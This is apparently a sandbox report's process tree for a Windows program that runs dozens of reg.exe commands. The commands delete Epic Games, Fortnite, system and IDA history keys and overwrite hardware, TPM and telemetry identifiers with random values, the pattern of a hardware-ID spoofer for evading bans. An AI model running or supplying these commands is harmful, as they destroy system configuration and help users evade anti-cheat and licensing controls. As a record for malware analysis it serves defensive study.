                                                                                                                                C:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic" "Games\Unreal" "Engine\Hardware" "Survey\HardwareSurveyFlags /f
                                                                                                                                3⤵
                                                                                                                                  PID:4884
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    REG delete HKCU\Software\Epic" "Games\Unreal" "Engine\Hardware" "Survey\HardwareSurveyFlags /f
                                                                                                                                    4⤵
                                                                                                                                    • Modifies registry key
                                                                                                                                    PID:4920
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic Games\Unreal Engine\Hardware Survey\HardwareSurveyFlags /f
                                                                                                                                  3⤵
                                                                                                                                    PID:4776
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      REG delete HKCU\Software\Epic Games\Unreal Engine\Hardware Survey\HardwareSurveyFlags /f
                                                                                                                                      4⤵
                                                                                                                                      • Modifies registry key
                                                                                                                                      PID:2520
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%-%random%-%random%-%random%%random% /f
                                                                                                                                    3⤵
                                                                                                                                      PID:5724
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 30785-19060-25508-236572572 /f
                                                                                                                                        4⤵
                                                                                                                                        • Modifies registry key
                                                                                                                                        PID:4544
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
                                                                                                                                      3⤵
                                                                                                                                        PID:2492
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
                                                                                                                                          4⤵
                                                                                                                                            PID:4280
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f
                                                                                                                                          3⤵
                                                                                                                                            PID:4844
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
                                                                                                                                            3⤵
                                                                                                                                              PID:4976
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
                                                                                                                                                4⤵
                                                                                                                                                • Modifies registry key
                                                                                                                                                PID:2348
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c reg delete HKCR\com.epicgames.launcher /f
                                                                                                                                              3⤵
                                                                                                                                                PID:5568
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  reg delete HKCR\com.epicgames.launcher /f
                                                                                                                                                  4⤵
                                                                                                                                                    PID:3940
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f
                                                                                                                                                  3⤵
                                                                                                                                                    PID:4996
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3144
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
                                                                                                                                                        4⤵
                                                                                                                                                          PID:956
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
                                                                                                                                                        3⤵
                                                                                                                                                          PID:2164
                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                            reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
                                                                                                                                                            4⤵
                                                                                                                                                              PID:3920
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
                                                                                                                                                            3⤵
                                                                                                                                                              PID:1268
                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
                                                                                                                                                                4⤵
                                                                                                                                                                • Modifies registry key
                                                                                                                                                                PID:3248
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
                                                                                                                                                              3⤵
                                                                                                                                                                PID:3536
                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                  reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Modifies registry key
                                                                                                                                                                  PID:3924
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:2440
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                    PID:5788
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:1880
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Apple-30785-19060-2550823657 /f
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:4360
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
                                                                                                                                                                      3⤵
                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                      PID:5828
                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                        REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d Apple-30785-19060-2550823657 /f
                                                                                                                                                                        4⤵
                                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                        PID:4684
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:2420
                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                          REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple-30785-19060-2550823657 /f
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:6100
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:4872
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:4756
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Modifies registry key
                                                                                                                                                                                PID:2216
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:3488
                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                  REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Apple-30785-19060-2550823657 /f
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:1332
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3628
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:5884
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:2160
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:4008
                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                            reg delete HKLM\SYSTEM\MountedDevices /f
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Modifies registry key
                                                                                                                                                                                            PID:916
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:2740
                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                              reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Modifies registry key
                                                                                                                                                                                              PID:5360
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:1808
                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:1860
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:5896
                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                                                    PID:3896
                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:6120
                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Modifies registry key
                                                                                                                                                                                                      PID:5408
                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:5984
                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                        REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d 30788298091060414953128862299617849272342177156462847629056 /f
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                        PID:3364
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:5616
                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                          REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Apple-30788-29809-1060414953 /f
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Modifies registry key
                                                                                                                                                                                                          PID:5244
                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:1720
                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                            REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Apple-30788-29809-1060414953 /f
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Modifies registry key
                                                                                                                                                                                                            PID:2980
                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:6020
                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                              REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Apple-30788-29809-1060414953 /f
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                              • Modifies registry key
                                                                                                                                                                                                              PID:3044
                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Classes\Interface /v ClsidStore /f
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:2496
                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                reg delete HKCU\Software\Classes\Interface /v ClsidStore /f
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:3768
                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:5856
                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Apple-30788-29809-1060414953 /f
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                                                                    PID:2008
                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:5204
                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Apple-30788-29809-1060414953 /f
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                      • Modifies registry key
                                                                                                                                                                                                                      PID:764
                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:5056
                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                        reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                        • Modifies registry key
                                                                                                                                                                                                                        PID:5548
                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:5612
                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                          reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Modifies registry key
                                                                                                                                                                                                                          PID:6132
                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:5116
                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                            reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                            • Modifies registry key
                                                                                                                                                                                                                            PID:6016
                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:1940
                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                              reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Modifies registry key
                                                                                                                                                                                                                              PID:804
                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:3520
                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Hex-Rays\IDA\History /f
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:5540
                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                  reg delete HKCU\Software\Hex-Rays\IDA\History /f
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                  • Modifies registry key
                                                                                                                                                                                                                                  PID:336
                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Hex-Rays\IDA\History64 /f
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:1904
                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                    reg delete HKCU\Software\Hex-Rays\IDA\History64 /f
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                                                                                    PID:5368
                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:1612
                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                      • Modifies registry key
                                                                                                                                                                                                                                      PID:1452
                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:2716
                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                        reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                        • Modifies registry key
                                                                                                                                                                                                                                        PID:2016
                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:1748
                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                          reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                          PID:4532
                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\Nsi\{eb004a03-9b1a-11d4-9123-0050047759bc}\3 /f
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:5952
                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                            reg delete HKLM\System\CurrentControlSet\Control\Nsi\{eb004a03-9b1a-11d4-9123-0050047759bc}\3 /f
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                            • Modifies registry key
                                                                                                                                                                                                                                            PID:4764
                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:228
                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                              reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                              • Modifies registry key
                                                                                                                                                                                                                                              PID:1128
                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\8c416c79-d49b-4f01-a467-e56d3aa8234c /f
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:2040
                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\8c416c79-d49b-4f01-a467-e56d3aa8234c /f
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                • Modifies registry key
                                                                                                                                                                                                                                                PID:2940
                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:1096
                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                  reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                  • Modifies registry key
                                                                                                                                                                                                                                                  PID:5020
                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Compatibility32\FortniteLauncher /f
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:5716
                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                    reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Compatibility32\FortniteLauncher /f
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                                                                                                    PID:3636
                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:5736
                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                      REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 30788298091060414953128862299617849272342177156462847629056 /f
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:2844
                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:240
                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                          REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d 307882980910604149531288622996178492723421771564628476 /f
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                          PID:3232
                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:4788
                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                            REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d 30792778928468624823201269222096124307551532266 /f
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                            • Modifies registry key
                                                                                                                                                                                                                                                            PID:5912
